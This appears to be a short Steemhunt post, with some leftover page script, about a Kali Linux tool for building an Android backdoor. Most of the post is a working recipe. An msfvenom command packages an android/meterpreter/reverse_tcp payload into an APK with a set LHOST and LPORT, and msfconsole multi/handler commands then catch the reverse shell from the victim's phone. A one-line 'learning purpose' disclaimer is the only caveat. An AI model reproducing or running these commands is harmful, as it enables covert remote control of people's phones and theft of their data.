or at least Edge to see the coolest products on Steemhunt.
'),document.write("\x3c!--"),document.execCommand("Stop"))Open source kali linux tool for creating back door in android.
$msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.178.30 LPORT=4444 R > result.apk
It will generate resultapk file which is back door.
In LHOST set your ip
and in your LPORT set your port which is open
$msfconsole
$use exploit/multi/handler
$set payload android/meterpreter/reverse_tcp
$set LHOST 192.168.178.30
$set LPORT 4444
$exploit
Use only for learning purpose
here is the github link
$0.32·14 votes· comments
You need a Steem account to join the discussion
Sign up now